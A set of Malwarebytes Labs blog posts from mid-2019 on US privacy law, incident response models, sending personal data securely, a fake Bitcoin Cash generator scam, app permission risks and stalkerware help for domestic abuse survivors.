“[It] should require that any data collection occur as part of a transparent, easy-to-understand transaction where the cost to consumers is clear, enabling them to be knowing and voluntary participants in an ad-supported and data-driven economy.”

Design for interoperability with GDPR

Johnny Ryan, chief policy officer for the privacy-focused web browser Brave, testified earlier this year before the US Senate Judiciary Committee about a potential federal data privacy law. Such a law, Ryan said, should hew closely to the standards of a popular, across-the-pond framework: the European Union’s General Data Protection Regulation (GDPR).

“We view the GDPR as essential,” Ryan said in an email to Malwarebytes Labs. “It can establish the conditions to allow young, innovative companies like ours to flourish.”

Ryan told the committee that two elements within the GDPR can help both protect Americans’ data and give opportunities for small companies to meaningfully compete with Silicon Valley’s biggest, most entrenched businesses. Those two provisions are the “purpose limitation” principle—which protects people’s data from being used in ways they could not anticipate—and the ability to easily opt out of a company’s data collection.

“These two GDPR tools, the ‘purpose limitation principle’, plus the ease of withdrawal of consent, enable freedom,” Ryan told the committee. “Freedom for the market of users to softly ‘break up’—and ‘un-break up’—big tech companies by deciding what personal data can be used for.”

Further, Ryan said to Malwarebytes Labs, a US federal data privacy law inspired by GDPR—particularly in defining concepts like personal data, opt-in consent, and profiling—will provide technology companies with a streamlined path toward compliance, since many have already worked toward complying with GDPR.

“The standard of protection in a federal privacy law, and the definition of key concepts and tools in it, should therefore be compatible and interoperable with the emerging GDPR de facto standard that is being adopted globally,” Ryan said.

Do not undermine states’ individual data privacy laws

Ever since Americans learned about a European consultancy’s effort to sway the 2016 US Presidential election by harvesting the Facebook data of tens of millions of non-consenting users, individual US states have clamped down hard on data misuse against their residents.

California passed the CCPA. Vermont passed a law regulating data brokers. Maine passed a law placing restrictions on how Internet service providers share Mainers’ personal information.

But those state laws could be in trouble if a federal data privacy law calls for their nullification. Such a provision exists in both Senator Marco Rubio’s data privacy bill and in the draft privacy legislation written by Center for Democracy and Technology.

This superseding provision—called “pre-emption”—is unacceptable to Brave.

“The federal law should be of equal or higher standard to state laws, and should not undermine state laws,” Ryan said.

A “Digital Bill of Rights”

When explaining what he would like to see in a federal privacy bill, Weaver repeatedly returned to the idea of a “Digital Bill of Rights.” It is an idea his company has already acted on, having written out and implemented several of the principles.

Included in the company’s Digital Bill of Rights are:

  • The right to change providers
    • Users can take all their data and move it to another service
  • The right to protect personal data
    • Users “own and control” the master keys to encrypt their data
  • The right to verify
    • Users can analyze the source code of software operating locally on their machines
  • The right to not be tracked
    • Users know about and have access to all the collections and uses of their data
    • Users can “obtain, correct, or permanently delete personal data”
    • User data that is collected for a purpose is deleted after that purpose is fulfilled
  • The right to access
    • Users will not be “discriminated against nor exploited based on personal data”

A digital bill of rights is a rare find for any technology company, but Weaver explained that Purism is not guided by the same rules as Big Tech. Instead, because Purism has incorporated as a “social purpose company,” it is not obliged to maximize shareholder value. Instead, it is obliged to fulfill the principles written in its articles of incorporation.

Those “Purist Principles,” Weaver explained, guide the company every day.

“It allows everyone, including me, our employees, to advance our causes before caring about profits or maximizing shareholder value,” Weaver said.

One last, important aspect about the rights described in the Purist Principles is that none of them can be removed by a company’s terms of service.

“If this was established at the federal level,” Weaver said, “this is saying ‘These are your rights, and nobody can remove these rights inside a Terms of Service [agreement] that nobody reads.’”

The post What should a US federal data privacy law ideally include? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Enterprise incident response: getting ahead of the wave

Malwarebytes - Wed, 07/10/2019 - 14:19

Enterprise defenders have a tough job. In contrast to small businesses, large enterprise can have thousands of endpoints, legacy hardware from mergers and acquisitions, and legacy apps that are business critical and prevent timely patching. Add to that a deluge of indicators and metadata from the perimeter that may represent the early stages of a devastating attack—or may be nothing at all.

So how do network defenders get out from behind the 8-ball? How do leaders bring an effective strategy to bear in mobilizing incident response (IR) resources? To deal with knotty problems like this, security researchers have developed a number of IR models to help bring a maximally sane, efficient strategy to network defense efforts.

The cyber kill chain

In 2011, Lockheed Martin developed the cyber kill chain. Borrowed from the US military, the kill chain essentially breaks most cyberattacks down to their constituent elements, and theorizes that forcing a hard stop to any of the seven phases will prevent the entire attack. So if an attack is caught at the installation phase and remediated, the attacker can no longer proceed to act on objectives. But if endpoint protection can stop an attack at the delivery phase, so much the better.

The general idea that makes the kill chain such an appealing way of looking at an attack is that you can’t block everything. Malspam will get through perimeter defenses. Reconnaissance will sometimes happen whether you like it or not. Exploitation will definitely happen with that one employee who is committed to clicking on everything.

So rather than throwing up a Maginot line of ever-increasing defenses at ever-escalating costs, the kill chain suggests that defenders have seven opportunities to shut down an attack, and can fight on a battlefield of their choosing. While it would be best to identify an attack at the Reconnaissance phase, killing it at the Delivery phase can keep the network just as safe, without burning out your SOC by expecting them to catch everything. Check out some more details on how the kill chain is implemented here.

The ATT&CK model

A somewhat more granular model, ATT&CK is a matrix that maps a lengthy list of attacker capabilities to a 12-step attack chain. Often seen as a complement to the kill chain, the ATT&CK can be a useful exercise to match TTPs already observed to attack chain phases to determine defense priorities. When looking at use cases for the model, threat data sharing is one of the most useful. Mapping out a full matrix of observed TTPs can be a method to quickly share a snapshot of the threat landscape across multiple defensive groups or different organizations.

Critiques of IR models

Most critiques of the kill chain and its more recent variants boil down to “what about X?” This is a little bit misguided, as attacker capabilities change over time, and a comprehensive matrix of TTPs would be exhausting to look at, and probably inaccurate in some way. What these models are really meant to assist with is bringing threat intelligence and strategy into the SOC to eliminate blind reactivity. Using any strategic model at all can bring better results than blind monitoring.

Intelligence: the bigger point

The takeaway for the SOC leader or CISO looking to implement an IR model is not picking the one, singularly correct model. Rather, implementing strategic defense in any form can boost the SOC’s responsiveness, efficiency, and accuracy. Having a well-mapped matrix tying observed indicators to specific attack phases can be an aid in prioritizing responses, as well as judging severity for a successful attack caught midstream.

Most importantly, having an incident response model forces SOC staff to respond to an incident in a strategic manner, addressing threats furthest along an attack chain first, and using threat staging to derive intelligence on potential ongoing attacks. As with conventional warfare, beating back attacks and winning the war depends on having a plan.

Stay vigilant, and stay safe.

The post Enterprise incident response: getting ahead of the wave appeared first on Malwarebytes Labs.

Categories: Techie Feeds

How to securely send your personal information

Malwarebytes - Mon, 07/08/2019 - 16:00

This story originally ran on The Parallax and was updated on July 3, 2019.

A few months ago, my parents asked a great security question: How could they securely send their passport numbers to a travel agent? They knew email wasn’t safe on its own.

Standard email indeed isn’t safe for sending high-value personal information such as credit card or passport numbers, according to security experts such as Robert Hansen, CEO of intelligence and analysis firm OutsideIntel, now part of Bit Discovery.

“Email sometimes has good cryptography but often does not,” Hansen says. When sending between Gmail accounts or within a company, he adds, secure transport “probably isn’t an issue.” But people should ask themselves, “Can somebody steal the data when it’s at rest?”

There’s no 100 percent hack-proof way to send your personal information across the Internet. But thanks to the development of end-to-end encryption, which secures data from even the company providing the encryption, there are tools and techniques you can use to make the process safer for you and the identification numbers we use to rule our lives.

Here are three expert tips for securely sending someone your personal information when planning your summer vacation, buying your next house, or just sending documents to your doctor’s office (when they don’t have their own secure messaging system.)

Tip 1: Use an app with end-to-end encryption

The use of encryption has been increasing “since the mid-1990s,” notes security expert Bruce Schneier, thanks to a seminal court case allowing companies to work on computer cryptography without having to first seek the government’s permission. 

Some phone apps protect your text messages using end-to-end encryption. We have highlighted several of the best in a guide to apps offering end-to-end encryption. Here are a few we find exceptionally useful for securely sending personal information.

WhatsApp, used by more than 1.5 billion people, is on every major and several minor platform, including an easy-to-use desktop browser app, and it provides end-to-end encryption by default. If you use WhatsApp (acquired by Facebook in 2014,) you use end-to-end encryption. It’s that simple, and its popularity means that you might not have to convince your intended recipient to install it.

WhatsApp’s encryption tech is actually provided by Open Whisper Systems, which makes its own end-to-end encryption text and voice app, Signal. So which app should you use? Signal arguably has two advantages over WhatsApp, at least from a security perspective. Signal doesn’t store any metadata on its chats, while WhatsApp does. It’s not the content of messages, but it can help identify the type of content being sent. Signal can be set to auto-delete messages, which is effective as long as the recipient hasn’t taken a screenshot or otherwise copied the content of the message.

Signal is also open-source, which means that the code on which it’s built is subject to independent reviews. WhatsApp development is closed, and doesn’t have people not associated with the company poking around in its code. While Signal is only for iPhone and Android, both Signal and WhatsApp can comfortably exist on the same device—they don’t conflict with each other. (Sometimes, however, Signal struggles to let its users go.)

As of July 2019, WhatsApp and Signal are the only two end-to-end encrypted messaging apps for which the advocacy nonprofit Electronic Frontier Foundation offers installation instructions in its Surveillance Self-Defense Tool Guide. The organization elsewhere in its guide recommends the end-to-end encrypted messaging app Wire. Wire works on Android, iOS, and desktops. One of Wire’s benefits is that it doesn’t require you to share your phone number to use the service, instead relying on usernames. That can help minimize the ability of others to track you. But it also stores conversation threads in plaintext when you use it across multiple devices.

End-to-end encrypted Wickr also allows users to delete messages they’ve sent after they’ve been viewed. Once you’ve deleted a message you’ve sent, you don’t have to worry about the recipient’s device storing it. However, because Wickr runs only on iOS and Android, and it has no password recovery method, you might have a hard time convincing your recipient to use it. (Editor’s note: Since this story was originally published, Wickr is still available to all users but is focused on businesses, not consumers.)

Tip 2: If you must use email…

If you must use email—perhaps you’re sending the Panama Papers—strongly consider learning about Pretty Good Privacy. The challenge with PGP is that not only do you have to use it correctly, with different instructions for WindowsMac, and Linux, but so does your recipient. You can consider sending a password-protected ZIP file, as long as the password isn’t in the same email you send. 

Electronic Frontier Foundation technologist Jeremy Gillula advises against creating a simple code for sending important numbers, such as changing all 1s to 2s. “If you’re using simple cipher, might as well call up the recipient and tell them over the phone,” he says.

Some email networks are encrypted within their own systems. If you know that your recipient is using Gmail, and you’re using Gmail, the content of the messages will be protected from snooping while being sent, Gillula says. “It can thwart a passive eavesdropper, but you’re still susceptible to active attacks.”

Tip 3: Ask questions

If you’re not sure about your recipient’s computer security, ask him or her about it. Hansen tells a story about trying to get a mortgage, and the mortgage company wanted “unbelievable amounts of information. I took one look at their website and found a number of different flaws in it.” 

He ended up finding a larger, more computer-savvy mortgage company. Good starter questions include:

  • Are the data you transmit and the databases that store it encrypted on disk? 
  • Is access to your information systems handled on a per-user basis, or does everybody use the same username and password?

If the data isn’t encrypted on disk and at rest, and if there’s only one username and password for accessing customer data, keep looking for a different service provider, Hansen says. From there, the questions you ask depend on whether you’re working with a travel agent, a health care provider, or a mortgage firm.

The post How to securely send your personal information appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (July 1 – 7)

Malwarebytes - Mon, 07/08/2019 - 15:08

Last week on Malwarebytes Labs, we explained what to do when you find stalkerware, how cooperating apps and automatic permissions are setting you up for failure, and why you should steer clear of Bitcoin Cash generators.

Other cybersecurity news:
  • A former Chief Information Officer (CIO) of Equifax has been issued a prison sentence for insider trading on the firm’s disastrous data breach before the incident became public knowledge. (Source: ZDNet)
  • A new Ryuk ransomware campaign is spreading globally, according to a warning issued by the UK’s National Cyber Security Centre (NCSC). (Source: DarkReading)
  • Orvibo smart home devices leaked billions of user records including logs that contained everything from usernames, email addresses, and passwords, to precise locations. (Source: VPNMentor)
  • Chinese authorities have decided to spy on foreigners crossing the border by installing spyware on Android phones. (Source: iPhoneHacks)
  • Germany‘s cybersecurity agency is working on a set of minimum rules that modern web browsers must comply with in order to be considered secure. (Source: ZDNet)
  • An ongoing attack in the OpenPGP community makes users’ certificates unusable and can essentially break the OpenPGP implementation of anyone who tries to import one of the certificates. (Source: Duo Security)
  • Dubbed Godlua, researchers have discovered the first known malware strain that uses the DNS over HTTPS protocol. (Source: TechSpot)
  • IronPython, darkly: how researchers uncovered an attack on government entities in Europe. (Source: PT Security)
  • Attunity, a company that is currently working with at least half of all Fortune 100 companies, including Netflix, leaked both its clients’ and its own data. (Source: BleepingComputer)
  • The US Cyber Command has issued an alert that hackers have been actively going after CVE-2017-11774. The flaw is a sandbox escape bug in Outlook. (Source: The Register)

Stay safe, everyone!

The post A week in security (July 1 – 7) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Steer clear of Bitcoin Cash generators

Malwarebytes - Wed, 07/03/2019 - 18:19

Here’s an interesting evolution on a well-worn scam, taking one profit generating fakeout and turning it into something else entirely.

For years, gamers have been stuck navigating the treacherous waters of fake video game giveaways. With so many actual genuine gaming giveaways around, you’re never quite sure if a site offering free Xbox points, or Steam credits, or downloadable content, is going to do what it claims.

Typically, the site will ask you to pick your reward then “verify you’re a human” or just help a fictitious process along by clicking an ad or filling in a survey or downloading a file and hoping it isn’t malware.

The gamer never gets their rewards. They may well end up with a few unexpected visitors on their desktops, though.

What’s the change here?

One enterprising individual has clearly had enough of the video game wilderness and decided to try and make money in a less explored realm.

Step up, Bitcoin—or to be more accurate, Bitcoin Cash. Bitcoin Cash is a form of cryptocurrency that went its own way in 2017, and then split again in what I can only call the great Bitcoin cash war of 2018 when two rival groups imagined vastly different directions for the fledgling currency.

The intention, with or without split, was supposed to be a digital coin that functioned more as a currency than a digital investment. It is this fertile ground that sets the scene for the site we’re about to look at: Bitcoin-cash-generator(dot)com.

Click to enlarge

Getting things started

The website claims to “inject exploits into Bitcoin Cash pools and blockchain.” They attempt to put pressure on visitors right from the start, claiming they limit use of the tool to 30 minutes per IP address, up to a maximum profit of 2.5BCH. That’s around £815/US$1,024, so it’s a tidy bit of profit for jumping some hoops. For reference, the minimum amount a visitor can ask for is 0.1 BCH, roughly £32/US$41.

Whatever slice of the pie a visitor picks, they’re going to get a little bit of money back…Or are they?

What hoops do we have to jump through?

Unlike many similar gaming-themed scam sites, surprisingly little. With no social aspect, there’s no real reason to plaster share buttons all over the place or ask to send to friends. This is all about the site visitor only. They simply have to “Enter your Bitcoin cash address bellow [sic]” and move a slider to select their desired amount. (And really, who will pick anything less than the maximum?) Then, they hit the start button.

Pop-ups abound of other IP addresses receiving amounts. “People” in the chatroom confirm it works great. Any hesitation a user might have had is likely gone at this point.

Click to enlarge

After confirming the desired amount, we’re off to the “this website is doing nothing at all” races.

Constructing the lie

Those familiar with the fake game points/ free gift card websites will know the drill. A collection of random boxes pops up, claiming to be hacking the Gibson. The more vaguely technical sounding it all is, the better—anything that sells the vision of actual, honest-to-goodness exploits doing strange exploity things in the background.

Click to enlarge

“Injecting transfer requests into the blockchain.” I hate when that happens.

Click to enlarge

“Connecting to blockchain maintenance channel”

Well of course, it always helps when you connect to the old blockchain maintenance channel.

This one is  a particular favourite of mine, as it’s every TV show’s attempt to show you some hacking on a screen in one hilarious image:

Click to enlarge

It also comes in handy for digging out multiple similar websites apparently using aspects of the same “We’re definitely hacking a blockchain, honest” code.

Multiple claims are made during the supposed hacking process that various attempts have failed to grab the cash, but they continue to persevere with it. Whereas many survey scams are almost instantaneous, these things really stretch out the illusion and make visitors wait a good few minutes while the titanic (fictional) battle rages in the background.

Eventually: success!

Sadly, success comes with a price. At this point, ye olde survey scam would ask you to fill in some offers. The free video game points site would ask you to install a dubious game or spam links across social media.


They need you to make a small donation, because of course they do. The site reads as follows:

The BitcoinCash network requires a small fee to be paid for each transaction that goes to the miners, else a transaction might never be confirmed. To ensure your transaction confirms consistently and reliably, pay the miners fee of 0.00316 BCH for this transaction at: [wallet address]

The request for 0.00316 BCH (roughly £1/US$1.30) is made regardless of whether you ask for the minimum/maximum amount of free cash. It doesn’t scale upwards.

Click to enlarge

Does this work?

The only thing that does work in all this is website visitors sending small amounts of cash to the people behind the website(s). As mentioned earlier, we’ve seen a few other sites doing much the same thing, such as freebtc(dot)uw(dot)hu and smartcoingenerator(dot)com:

Click to enlarge

Click to enlarge

Money trails

One interesting aspect of this type of scam branching out into digital coinland is increased visibility into site owner antics. You can only go so far with survey scams or random social media profiles sending out spam links. Here, however, much of what constitutes digital transactions are out there in the ether as a matter of public record.

There are entire sub-industries devoted to analysis of Bitcoin transactions and how people make their digital cash flow down the money tubes. Generally, most folks’ experience of watching the Bitcoin wheels go ’round are focused on plain old Bitcoin. Bitcoin Cash is a little different, but you can still take a look behind the scenes.

The various sites we’ve seen offer up different addresses to send their “small transactions,” and not all of them are focused on BitCoin Cash. With reference to the one used on Bitcoin Cash Generator, they do appear to have made a little money so far. It seems doubtful anyone is going to retire from it, though.

Another scam bites the dust

These Bitcoin Cash Generator sites are yet another sub-genre of survey scams that need to be filed under the “Something for nothing” label. If getting your hands on digital currency was this easy, everybody would be doing it. Instead, it’s a unique selling point for a handful of websites lurking in the corners of the net.

The post Steer clear of Bitcoin Cash generators appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Cooperating apps and automatic permissions are setting you up for failure

Malwarebytes - Tue, 07/02/2019 - 16:53

“Hey you. Someone from HR has invited you to a meeting on Thursday. Would you like me to add the appointment to the calendar?”

Receiving an email notification when someone has invited you to a meeting is a feature that many professionals would not like to miss. Being able to log in at certain sites with your Facebook profile might be less indispensable, but nevertheless, it’s a heavily-used functionality. What do these two functions have in common? They both require an integration between different apps, and this opens up some security and privacy risks.

Some practical problems

Recently, we were reminded that the Google Calendar notifications in Gmail provided scammers with the option to spam users with phishing links to sites that are out to steal user credentials. Basically, scammers were able to craft the links in the invitation so that they included a malicious link. Since this is a relatively unknown method, most people wouldn’t think twice before clicking.

Logging into sites with social media profiles more than doubles the privacy risks you run into by using either app separately. We say this because the data used by either app can easily be combined with those of the other app—therefore cybercriminals can come away with double the payday.

You may have seen these login options for Twitter, Google, and Facebook. And Facebook combines these risks with yet another problem. Many people that canceled their Facebook accounts (or thought they did) have found that coming back to a site where they used to log in with their Facebook account revives said Facebook profile and opens it up for the world to see again.

Seems easier to just choose Facebook or Google, right?

And we haven’t even touched upon the apps that grab the permission to post on these social media sites on your behalf.

Underlying problems

Before we can start to look for effective countermeasures, we need to understand the real foundation behind these security risks. The most common and well-known problems include:

  • Apps that refuse to work without permissions. They shouldn’t require integration.
  • Apps that grant other apps access to their data and settings.
  • Apps that are downloaded and installed by impulse. We tend to forget about them after we’ve stopped using them, but the data sharing goes on.
  • Jailbreaking, rooting, and sideloading apps. Apps outside the Google Play or App Store are not as secure. However, popular games like Fortnite were not available in Google Play, basically forcing their fans to compromise their safety to install the game.
  • Lack of awareness of the implications of granting permissions. Even when the permissions are clearly communicated (the app will be able to post to your Twitter account, for example), users have the inclination to think it will be all right to allow “trusted apps” full permissions.

Even though not every app in the Play Store is 100 percent trustworthy, you can be assured that at least some security checks have been performed. Google does require developers to limit their device permission requests to what’s really necessary for the app. And they do block many apps from the Play Store because they may be harmful, but there are always those that manage to slither through.

These are just the measures taken against apps that are potentially harmful. We shouldn’t forget those that invade or risk your privacy. What’s important to remember here is that when you are installing apps from other unknown sources, they most likely didn’t have to pass any scrutiny at all—and are a likely security or privacy risk.

A regular check of your list of apps may result in some good device-cleaning, which not only reduces your attack surface, but also might improve your device’s performance and speed. While you’re at it, check the permissions on some of the apps that you decide to keep. They may not need all of them to do what you want or expect the app to do for you.

When an app asks for permissions, carefully read what it is asking for and let that sink in before you allow it. I know that these requests always seem to come at an inconvenient moment. You are in a hurry and you want that notification out of your way so you can carry on and use the app.

But consider why a gaming app is asking for access to GPS location. Or how come that financial app wants access to all of your contacts. Is the app really worth turning over that private information? Also note that these requests are not limited to the install process. They may come after an update or when you are trying a new feature.null

Partial solutions

Right now, without more user awareness of the security risks of integration, and without the applications, software programs, or social media platforms narrowing down their permissions requests to only what’s necessary to make the program work, there are only partial solutions for those looking for convenient installation or login processes. However, these solutions do improve your overall security posture without sacrificing too many benefits.

When it comes to integrations, there are a few tips we are happy to share.


If you decide to unpair your apps and websites from Facebook, follow the directions below:

  • Under the Facebook menu, go to Settings.
  • Under Security, select Apps and websites then click on the “Logged in with Facebook” section.
  • Select to remove all the entries that you will no longer be using. You can also see what information each app was able to retrieve from your Facebook profile. Quite an eye-opener.

Google has an informative page in their Help Center about giving third-party apps access to your Google account. It reads:

“Depending on how you use Google products, some of the information in your account may be extra sensitive. When you give access to third-parties, they may be able to read, edit, delete, or share this private information.”

The integration between Gmail and Google calendar can be rendered less automated (and thus less of a security risk) by turning off the automatic calendar invitations feature. Here are the directions:

  • Go to the Event Setting menu in Google Calendar and disable the automatically add invitations option.
  • Enable the only show invitations to which I’ve responded one instead.
  • Also, users are advised to make sure that the Show declined events in the “View Options” section is also left unchecked.

Twitter has a similar page as Google called About third-party applications and log in sessions which warns:

“You should be cautious before giving third-party applications access to use your account.”

The page also provides information on how to remove access for sites and apps. Have a look and check for any unexpected guests.

Cooperating apps

I realize that cooperating apps are designed to make our life easier. After all, it’s frustrating if the left hand doesn’t know what the right hand is doing. And when everything works seamlessly together, our online life has a natural flow. I’m just asking you to give it some thought before you blindly allow integrations and permissions.

It looks as though users have shifted mindsets from “I have nothing to hide” to “They already know everything anyway.” But in both cases, it is true that you don’t have to hand your personal data to “them” on a silver platter, no matter who they are. Your personal information is too valuable to just give away. After all, that’s why cybercriminals (and legitimate organizations) are after it to begin with.

Stay safe out there!

The post Cooperating apps and automatic permissions are setting you up for failure appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (June 24 – 30)

Malwarebytes - Mon, 07/01/2019 - 17:02

Last week on Malwarebytes Labs, we peeled back the mystery on an elusive malware campaign that relied on blank JavaScript injections, detailed for readers our latest telemetry on the tricky GreenFlash Sundown exploit, and looked at one of the top campaigns directing traffic toward scareware pages for Microsoft’s Azure Cloud Services.

We also doubled down on our commitment—and significantly increased efforts—to detect stalkerware on victims’ devices.

Other cybersecurity news:

Stay safe, everyone!

The post A week in security (June 24 – 30) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Helping survivors of domestic abuse: What to do when you find stalkerware

Malwarebytes - Mon, 07/01/2019 - 16:51

We’re going to talk about something different today. We’re going to talk about domestic abuse.

Earlier this year, cybersecurity company Kaspersky Lab announced that the latest upgrade to its Android app would inform users about whether their devices were running stealthy, behind-the-scenes monitoring apps sometimes referred to as stalkerware.

This type of software can track unsuspecting victims’ locations, record phone calls, peer into text messages and emails, pry into locally-stored photos and videos, and rifle through web browsing activity, all while hidden from view.

Though often, and shamelessly, advertised as a tool for parents to track the activity of their children, these apps are commonly used against survivors of domestic abuse.

It serves as no surprise. Stalkerware coils around a victim’s digital life, giving abusive partners what they crave: control.

Electronic Frontier Foundation Cybersecurity Director Eva Galperin, who pushed Kaspersky Labs into improving its product, told Motherboard at the time of the company’s announcement:

“I would really like to see other [antivirus] companies follow suit, so that I can recommend them instead of just one company that has shown that they are committed to doing this… I’d like to see this be the industry standard so it doesn’t matter which product you’re downloading.”

Malwarebytes stands up to this commitment, as we have for years.

But starting today, we’re going to do more than improve our stalkerware detection capabilities. We’re going to help survivors understand this danger and know what to do if they’re being digitally tracked.

Finding proof of stalkerware

Stalkerware presents a unique detection problem for its victims—it often hides itself from public view, and any attempt to find it could be recorded by the stalkerware itself.

Further, the US government has done little to help. Despite a previous FBI investigation that led to the court-ordered shut down of the stalkerware app StealthGenie, countless other stalkerware apps still operate today.

CitizenLab, a research institution at the University of Toronto that focuses on technology and human rights, recently produced a study on the harms of stalkerware. Researchers studied eight apps based on their monitoring capabilities and relative popularity—analyzed through Google Trends, web searches, and “best of” lists. The study focused on the following apps which are used in the US, Canada, and Australia: FlexiSpy, Highster Mobile, Hoverwatch, Mobistealth, mSpy, TeenSafe, TheTruthSpy, and Cerberus.

Malwarebytes Labs has previously written about the technological signs of stalkerware—quickly-depleting battery life, increased data usage, and longer response times than usual—but we wanted to explore what stalkerware looks like from a behavioral aspect. We spoke to multiple domestic abuse networks and advocacy groups, and one troubling fact arose repeatedly:

Symptoms of stalkerware are not proof of stalkerware.

Erica Olsen, director of the Safety Net project for the National Network to End Domestic Violence, said her organization consistently hears stories from domestic abuse survivors who are struggling to explain how their partners know about their phone calls, text message conversations, emails, and even visited locations.

“Survivors could come to law enforcement and say ‘My ex knows about the text messages I sent, and I don’t know how they know that,’” Olsen said. But, she said, the signs don’t always guarantee the use stalkerware.

“Could the [recipient] have just told [the ex]?” Olsen said.

In determining the presence of stalkerware, Olsen said survivors should assess several factors:

  • Does their abusive partner have physical access to their device—a common situation for couples who live together?
  • Does their abusive partner know the passcode to unlock a device—another situation that depends on whether an abusive partner even allows for that level of agency and freedom from their victim.
  • Can their abusive partner view call logs on their device, learning who was called, how often, and for how long?
  • Does their abusive partner know the content of phone calls?
  • For domestic abuse survivors who have physically escaped their abuser, do their abusers still know about recently-taken photographs, locations visited, and any information that is typically locked behind an account or device passcode?

Further, Olsen said that domestic abuse survivors should study how the private information is being used by an abuser.

“Abusers will end up hinting at all the things they know that they shouldn’t know,” Olsen said. “That is the most frequent thing we hear from survivors, advocates, and law enforcement—the number one thing is identifying that an abuser knows ways too much.”

Olsen continued: “They know text messages, emails, they have access to accounts logged into via [the survivor’s] phone. That’s when we immediately have to start talking to survivors about what they think is safe.”

While every safety plan is unique, and every domestic abuse situation nuanced, Olsen offered one top-level piece of advice that applies to all survivors: Trust yourself. You know the feeling of being watched and controlled—whether through physical, emotional, mental, or digital means. You should trust those feelings and never discount your own concerns. 

The following ideas do not present a catch-all “solution” to finding stalkerware on a device. Instead, they present information that will hopefully guide survivors toward safety.

Evaluate your own level of safety

Determining what is safe for you is crucial. What you discover in this process can impact what other steps you take after learning about or suspecting the presence of stalkerware on your device.

Ask yourself several questions about what steps you can reliably take.

  • Do you have people you can ask for support?
  • Can you communicate with those people from a safe, non-monitored device?
  • Can you change your social media account passwords?
  • Can you change your own device passcode?
  • Are you allowed to have a device passcode?
  • Can you install antivirus and anti-malware programs on your own device?
  • What would be the consequences of your abusive partner discovering that you are trying to get rid of stalkerware?
  • Do you want to bring in law enforcement?

If all this seems overwhelming, remember that the National Domestic Violence Hotline is there to help.

Your every move might be recorded

When determining your own level of safety, it’s important to remember that everything you do on your compromised device could be recorded and watched by an abusive partner. That means your web browsing activity, your text messages, your emails, and all of your written correspondence could be far from private.

Know what apps are on your phone and what permissions they’re allowed

Olsen advised that domestic abuse survivors know what apps are on their devices at any given moment. While this guideline does not reliably catch hidden stalkerware apps, it does give you an opportunity to understand what other apps might have been installed on your device in an attempt to surveil you.

Remember, abusive partners do not need stalkerware to victimize and control their partners. Instead, Olsen said, abusers can rely on technology misuse.

“The vast majority of our work is in looking at misuses of general technologies that have 100 different good uses, that are never intended to be misused,” Olsen said. “The ownership [of abuse] is always on the abuser for their behavior. If you remove technology, you’re still going to have an abusive person.”

Shaena Spoor, program assistant with W.O.M.A.N. Inc., offered a couple of examples of technology misuses that she has heard about.

“We had some concerns with Snap Maps,” Spoor said about the Snapchat feature rolled out in 2017 that let users find their friends’ locations. Every user that agreed to share their location had their locations updated with every app use.

“For some people, they didn’t realize that locations had been [turned] on,” Spoor said. “If you don’t use the app very often, you’re just sitting on a map, super findable.”

Spoor said she also heard of domestic abuse survivors whose locations were tracked through the use of the location-tracking product Tile. Though sold to legitimately track luggage, wallets, and purses, domestic abusers can also sneak the small plastic device into your jacket or work bag. When the abuser loads up the Tile app, they can then get a real-time result of that device, and thus, your location.

“People use Tile, for example, and hide them in survivor’s stuff,” Spoor said. “[Survivors] are showing up at domestic violence shelters and finding it hidden in a bag.”

Create new online account logins and passwords from a safe device

This one comes straight from the National Network to End Domestic Violence’s Technology Safety project. You should think about making new account logins and passwords.

As one of the the Technology Safety project’s many resource said:

“If you suspect that anyone abusive can access your email or Instant Messaging (IM), consider creating additional email/IM accounts on a safer computer. Do not create or check new email/IM accounts from a computer that might be monitored.”

The Tech Safety resource also advises you to open new accounts with no identifying information, like real names or nicknames. This step should be considered for all important online accounts, including your banking and social media accounts.

Always remember to do this from a safe computer that is not being monitored.

Factory reset or toss your device

Multiple organizations recommended that any stalkerware victim take immediate steps to toss, or wipe clean, their current device. There are a few options:

  • Toss your device and buy a new one
  • Factory reset your device
  • Keep your compromised device, but purchase a new phone that you use for confidential conversations

Olsen advised that every situation has its own unique challenges, and she urged domestic abuse survivors to consider the potential outcomes of whatever option they choose. She said her organization works closely with domestic abuse survivors to come up with the best plan for them.

“We think about the abuser, who no longer has remote access to [the survivor]—they will try to get physical access, and that is a real concern which absolutely could happen,” Olsen said. “If the survivor thinks that [might happen], we try alternatives—buying a pay-as-you-go phone, use it to have critical conversations, private ones, but still keep the regular phone for silly things and to keep the [abuser] at bay.”

Chris Cox, founder of Operation Safe Escape, which works directly with domestic abuse networks and shelters and law enforcement to provide operational and cybersecurity support, echoed similar advice.

“What we always advise, consistently, if an abuser ever had access to the device, leave it behind. Never touch it. Get a burner,” Cox said, using the term “burner” to refer to a prepaid phone, purchased with cash. “You have to assume the device and the accounts are compromised.”

Further, Cox cautioned against survivors trying to wipe stalkerware from a device, as it could introduce a “new vulnerability” in which an abuser learns—through the stalkerware itself—that their victim is trying to thwart the abuser.

Instead, Cox said, “whenever possible, the device is left behind.”

Approach law enforcement

Working with the police is a step taken by survivors who want to take legal action, whether that means eventually obtaining a restraining order or bringing charges against their abuser.

Because of this step’s nuance, you should take caution.

Olsen said that, of the successful attempts she has learned of survivors working with local police, the survivors already have a firm safety plan in place, and they have built a relationship with domestic abuse shelters and advocates. She said that, together with their support network, survivors have managed to get confessions out of their abusers.

But, Olsen stressed, trying to get an abuser to admit to their abusive and potentially criminal behavior is not a step to be taken alone.

“I do not suggest doing this in isolation, but if they’re working with advocates, I have heard of some survivors strategically communicating with abusers,” Olsen said. “It is amazing how many times abusers admit to [using stalkerware].”

Also, survivors should be wary of how police can be used against them, said Cox.

“Abusers, as a whole, are adept at using the law as a weapon,” Cox said. “If a phone belongs to a victim, and it happens to be in the abuser’s name, if the victim leaves and the abuser reports it stolen, [law enforcement] are used as a weapon to track the victim down.”

Call the National Domestic Violence Hotline

If you find stalkerware on your device, or you have strong suspicions about an abusive partner knowing too much about your personal life—with details from text messages and knowledge of private photos—call the hotline from a safe device.

The number for the National Domestic Violence Hotline is 1−800−799−7233.

The hotline’s trained experts can help you find the safest path forward, all while maintaining your confidentiality.

Seek help from various online resources

If you want to find more information online, from a safe device, read through any of these resources about dealing with domestic abuse, stalkerware, and the misuse of technology:

